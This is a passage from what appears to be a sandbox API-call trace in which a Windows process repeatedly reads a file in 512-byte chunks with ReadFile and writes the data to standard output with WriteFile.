lpBuffer=0x24f1cc*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.371] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.371] GetFileType (hFile=0x50) returned 0x1 [0214.371] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.371] WriteFile (in: hFile=0x50, lpBuffer=0x24f21c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f21c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.371] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.371] GetFileType (hFile=0x50) returned 0x1 [0214.371] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.371] WriteFile (in: hFile=0x50, lpBuffer=0x24f26c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f26c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.371] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.371] GetFileType (hFile=0x50) returned 0x1 [0214.371] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.371] WriteFile (in: hFile=0x50, lpBuffer=0x24f2bc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f2bc*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.371] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.371] GetFileType (hFile=0x50) returned 0x1 [0214.371] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.371] WriteFile (in: hFile=0x50, lpBuffer=0x24f30c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f30c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.371] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.371] GetFileType (hFile=0x50) returned 0x1 [0214.371] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.371] WriteFile (in: hFile=0x50, lpBuffer=0x24f35c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f35c*, lpNumberOfBytesWritten=0x24e360*=0x20, lpOverlapped=0x0) returned 1 [0214.371] _get_osfhandle (_FileHandle=4) returned 0x58 [0214.371] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x24e34c | out: lpNewFilePointer=0x0) returned 1 [0214.371] _get_osfhandle (_FileHandle=4) returned 0x58 [0214.371] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.371] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.371] GetFileType (hFile=0x50) returned 0x1 [0214.371] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.371] GetFileType (hFile=0x50) returned 0x1 [0214.371] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.371] WriteFile (in: hFile=0x50, lpBuffer=0x24f17c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.372] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.372] GetFileType (hFile=0x50) returned 0x1 [0214.372] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.372] WriteFile (in: hFile=0x50, lpBuffer=0x24f1cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f1cc*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.372] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.372] GetFileType (hFile=0x50) returned 0x1 [0214.372] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.372] WriteFile (in: hFile=0x50, lpBuffer=0x24f21c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f21c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.372] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.372] GetFileType (hFile=0x50) returned 0x1 [0214.372] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.372] WriteFile (in: hFile=0x50, lpBuffer=0x24f26c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f26c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.372] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.372] GetFileType (hFile=0x50) returned 0x1 [0214.372] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.372] WriteFile (in: hFile=0x50, lpBuffer=0x24f2bc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f2bc*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.372] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.372] GetFileType (hFile=0x50) returned 0x1 [0214.372] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.372] WriteFile (in: hFile=0x50, lpBuffer=0x24f30c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f30c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.372] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.372] GetFileType (hFile=0x50) returned 0x1 [0214.372] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.372] WriteFile (in: hFile=0x50, lpBuffer=0x24f35c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f35c*, lpNumberOfBytesWritten=0x24e360*=0x20, lpOverlapped=0x0) returned 1 [0214.372] _get_osfhandle (_FileHandle=4) returned 0x58 [0214.372] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x24e34c | out: lpNewFilePointer=0x0) returned 1 [0214.373] _get_osfhandle (_FileHandle=4) returned 0x58 [0214.373] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.373] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.373] GetFileType (hFile=0x50) returned 0x1 [0214.373] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.373] GetFileType (hFile=0x50) returned 0x1 [0214.373] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.373] WriteFile (in: hFile=0x50, lpBuffer=0x24f17c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.373] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.373] GetFileType (hFile=0x50) returned 0x1 [0214.373] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.373] WriteFile (in: hFile=0x50, lpBuffer=0x24f1cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f1cc*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.373] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.373] GetFileType (hFile=0x50) returned 0x1 [0214.373] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.373] WriteFile (in: hFile=0x50, lpBuffer=0x24f21c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f21c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.373] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.373] GetFileType (hFile=0x50) returned 0x1 [0214.373] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.373] WriteFile (in: hFile=0x50, lpBuffer=0x24f26c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f26c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.373] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.373] GetFileType (hFile=0x50) returned 0x1 [0214.373] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.373] WriteFile (in: hFile=0x50, lpBuffer=0x24f2bc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f2bc*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.373] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.373] GetFileType (hFile=0x50) returned 0x1 [0214.373] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.373] WriteFile (in: hFile=0x50, lpBuffer=0x24f30c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f30c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.373] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.373] GetFileType (hFile=0x50) returned 0x1 [0214.374] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.374] WriteFile (in: hFile=0x50, lpBuffer=0x24f35c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f35c*, lpNumberOfBytesWritten=0x24e360*=0x20, lpOverlapped=0x0) returned 1 [0214.374] _get_osfhandle (_FileHandle=4) returned 0x58 [0214.374] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x24e34c | out: lpNewFilePointer=0x0) returned 1 [0214.374] _get_osfhandle (_FileHandle=4) returned 0x58 [0214.374] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.374] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.374] GetFileType (hFile=0x50) returned 0x1 [0214.374] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.374] GetFileType (hFile=0x50) returned 0x1 [0214.374] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.374] WriteFile (in: hFile=0x50, lpBuffer=0x24f17c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.374] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.374] GetFileType (hFile=0x50) returned 0x1 [0214.374] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.374] WriteFile (in: hFile=0x50, lpBuffer=0x24f1cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f1cc*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.374] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.374] GetFileType (hFile=0x50) returned 0x1 [0214.374] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.374] WriteFile (in: hFile=0x50, lpBuffer=0x24f21c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f21c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.374] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.374] GetFileType (hFile=0x50) returned 0x1 [0214.374] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.374] WriteFile (in: hFile=0x50, lpBuffer=0x24f26c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f26c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.374] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.374] GetFileType (hFile=0x50) returned 0x1 [0214.374] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.374] WriteFile (in: hFile=0x50, lpBuffer=0x24f2bc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f2bc*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.374] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.374] GetFileType (hFile=0x50) returned 0x1 [0214.375] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.375] WriteFile (in: hFile=0x50, lpBuffer=0x24f30c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f30c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.375] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.375] GetFileType (hFile=0x50) returned 0x1 [0214.375] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.375] WriteFile (in: hFile=0x50, lpBuffer=0x24f35c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f35c*, lpNumberOfBytesWritten=0x24e360*=0x20, lpOverlapped=0x0) returned 1 [0214.375] _get_osfhandle (_FileHandle=4) returned 0x58 [0214.375] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x24e34c | out: lpNewFilePointer=0x0) returned 1 [0214.375] _get_osfhandle (_FileHandle=4) returned 0x58 [0214.375] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.375] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.375] GetFileType (hFile=0x50) returned 0x1 [0214.375] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.375] GetFileType (hFile=0x50) returned 0x1 [0214.375] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.375] WriteFile (in: hFile=0x50, lpBuffer=0x24f17c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.375] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.375] GetFileType (hFile=0x50) returned 0x1 [0214.375] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.375] WriteFile (in: hFile=0x50, lpBuffer=0x24f1cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f1cc*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.375] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.375] GetFileType (hFile=0x50) returned 0x1 [0214.375] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.375] WriteFile (in: hFile=0x50, lpBuffer=0x24f21c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f21c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.375] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.375] GetFileType (hFile=0x50) returned 0x1 [0214.375] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.375] WriteFile (in: hFile=0x50, lpBuffer=0x24f26c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f26c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.376] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.376] GetFileType (hFile=0x50) returned 0x1 [0214.376] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.376] WriteFile (in: hFile=0x50, lpBuffer=0x24f2bc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f2bc*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.376] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.376] GetFileType (hFile=0x50) returned 0x1 [0214.376] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.376] WriteFile (in: hFile=0x50, lpBuffer=0x24f30c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f30c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.376] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.376] GetFileType (hFile=0x50) returned 0x1 [0214.376] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.376] WriteFile (in: hFile=0x50, lpBuffer=0x24f35c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f35c*, lpNumberOfBytesWritten=0x24e360*=0x20, lpOverlapped=0x0) returned 1 [0214.376] _get_osfhandle (_FileHandle=4) returned 0x58 [0214.376] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x24e34c | out: lpNewFilePointer=0x0) returned 1 [0214.376] _get_osfhandle (_FileHandle=4) returned 0x58 [0214.376] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.376] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.376] GetFileType (hFile=0x50) returned 0x1 [0214.376] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.376] GetFileType (hFile=0x50) returned 0x1 [0214.376] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.376] WriteFile (in: hFile=0x50, lpBuffer=0x24f17c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.376] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.376] GetFileType (hFile=0x50) returned 0x1 [0214.376] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.376] WriteFile (in: hFile=0x50, lpBuffer=0x24f1cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f1cc*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.376] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.376] GetFileType (hFile=0x50) returned 0x1 [0214.376] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.376] WriteFile (in: hFile=0x50, lpBuffer=0x24f21c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f21c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.377] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.377] GetFileType (hFile=0x50) returned 0x1 [0214.377] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.377] WriteFile (in: hFile=0x50, lpBuffer=0x24f26c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f26c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.377] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.377] GetFileType (hFile=0x50) returned 0x1 [0214.377] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.377] WriteFile (in: hFile=0x50, lpBuffer=0x24f2bc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f2bc*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.377] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.377] GetFileType (hFile=0x50) returned 0x1 [0214.377] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.377] WriteFile (in: hFile=0x50, lpBuffer=0x24f30c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f30c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.377] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.377] GetFileType (hFile=0x50) returned 0x1 [0214.377] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.377] WriteFile (in: hFile=0x50, lpBuffer=0x24f35c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f35c*, lpNumberOfBytesWritten=0x24e360*=0x20, lpOverlapped=0x0) returned 1 [0214.377] _get_osfhandle (_FileHandle=4) returned 0x58 [0214.377] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x24e34c | out: lpNewFilePointer=0x0) returned 1 [0214.377] _get_osfhandle (_FileHandle=4) returned 0x58 [0214.377] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.377] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.377] GetFileType (hFile=0x50) returned 0x1 [0214.377] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.377] GetFileType (hFile=0x50) returned 0x1 [0214.377] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.377] WriteFile (in: hFile=0x50, lpBuffer=0x24f17c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.377] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.377] GetFileType (hFile=0x50) returned 0x1 [0214.377] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.377] WriteFile (in: hFile=0x50, lpBuffer=0x24f1cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f1cc*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.377] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.377] GetFileType (hFile=0x50) returned 0x1 [0214.378] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.378] WriteFile (in: hFile=0x50, lpBuffer=0x24f21c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f21c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.378] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.378] GetFileType (hFile=0x50) returned 0x1 [0214.378] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.378] WriteFile (in: hFile=0x50, lpBuffer=0x24f26c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f26c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.378] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.378] GetFileType (hFile=0x50) returned 0x1 [0214.378] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.378] WriteFile (in: hFile=0x50, lpBuffer=0x24f2bc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f2bc*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.378] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.378] GetFileType (hFile=0x50) returned 0x1 [0214.378] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.378] WriteFile (in: hFile=0x50, lpBuffer=0x24f30c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f30c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.378] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.378] GetFileType (hFile=0x50) returned 0x1 [0214.378] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.378] WriteFile (in: hFile=0x50, lpBuffer=0x24f35c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f35c*, lpNumberOfBytesWritten=0x24e360*=0x20, lpOverlapped=0x0) returned 1 [0214.378] _get_osfhandle (_FileHandle=4) returned 0x58 [0214.378] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x24e34c | out: lpNewFilePointer=0x0) returned 1 [0214.378] _get_osfhandle (_FileHandle=4) returned 0x58 [0214.378] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.378] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.378] GetFileType (hFile=0x50) returned 0x1 [0214.378] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.378] GetFileType (hFile=0x50) returned 0x1 [0214.378] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.378] WriteFile (in: hFile=0x50, lpBuffer=0x24f17c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.378] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.378] GetFileType (hFile=0x50) returned 0x1 [0214.378] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.379] WriteFile (in: hFile=0x50, lpBuffer=0x24f1cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f1cc*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.379] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.379] GetFileType (hFile=0x50) returned 0x1 [0214.379] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.379] WriteFile (in: hFile=0x50, lpBuffer=0x24f21c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f21c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.379] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.379] GetFileType (hFile=0x50) returned 0x1 [0214.379] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.379] WriteFile (in: hFile=0x50, lpBuffer=0x24f26c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f26c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.379] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.379] GetFileType (hFile=0x50) returned 0x1 [0214.379] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.379] WriteFile (in: hFile=0x50, lpBuffer=0x24f2bc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f2bc*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.379] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.379] GetFileType (hFile=0x50) returned 0x1 [0214.379] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.379] WriteFile (in: hFile=0x50, lpBuffer=0x24f30c*, nNumberOfBytesToWrite=0x50, 